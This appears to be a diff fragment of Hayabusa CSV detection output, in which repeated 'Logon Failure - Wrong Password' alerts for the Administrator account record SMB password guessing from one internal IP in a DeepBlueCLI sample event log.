+2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fqw2GWiYfO0kU83 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFPJJNCFdPJl4igl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zc6CrAr7YoozKB6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHXminAIeV4ZJIK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06YmUCHNZqbaZMdZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fYoENCtP2uPy9xNh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TRJRuXJTTH1afAfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpnkzTlc3Uvj3hpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIuD8haFzR8P87rL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL1IreMAiE564NXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMUiCaMGBC46MnPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MOSWbwooyb60LExG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSDNF7s3vbtkZIOz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JBMk0qOV6237XtK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j41R1U1tYPvApCkZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcPkVZSeg5VwChW8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDLxt5gaFDTKsiVl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94JvBKdxJkawQQMT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KgBMk00K3iC1GQem | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XdGOj9Ybm6bcCo3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: by6F4YKorxhp5ahn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1G6ZOgOaV6luDQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qqSwNfvpPLQd6ZH1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mxtJJj54xSzHibHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Y3yznfdaZ7dtwDO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esllFn4asbLxwkBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Pr0cgd6cF5ukhZ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pS2fabTrbl6rZ1NB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkylDDmUyuT57HdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Aqs8rSvuLAQuhfDp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KI07KTgBJc4kBSKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Re3n3nJ8EEhRRT3G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BzspAC3z1csEn0Ve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tpkb6bf42SLUst3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1F5d2wn60OgAExW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bhPNRHWhTyonDPuA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zEsnyWpUuHVBo6et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I2FwaWy9TALkk9eU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fuikeQsxlOUVifVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZWdsRJp9fHypPI1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0j0IBX2eZnx99n9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YIZ5Knxg0xr0WmDb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wuej3f7mEoWmd4SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0LcCi06ilIhFPwb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWsCGgoFmH06rRf4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP47JjNKqtYIZPsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mNlWZ9o0xf7bl2d0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnPnB2lEN3BSDpXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVMyeF9jGuzHkTHg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sDKLl3PjW2qrzJGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkllnePSq3NQ5wgC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9qLWgQnR7P9cs7s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1AdU07nzvv7RB2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cHgiB5SMiQtsl5oD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 03e7QOn36l0jH35H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DoJBywV8x8cURwrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDYGYO6s6g6Dbx8r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nUqXpeTNePFyBmCo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2h0qJWcbzRe1GSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edsfNOovOl1Ow503 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cxCC83XLMIJrNMvl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzussOcg5ihdrnD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 55l4HKICu8x0FpQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5GmlVWDjZ75tT08G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6v1DkuFvB04PESQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTLdNb0XbzXuLi51 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSjDYb1BhHC9UTxO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1yLH19VsfLx9BGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4AVhjdz9yHsfss0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqWLOKaKwS8VBxDj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjK8A8DTSYursBzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaDCKPslwRaLBWtH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAvoekviFDSAIgBe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3XOmFwh8IamESWCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
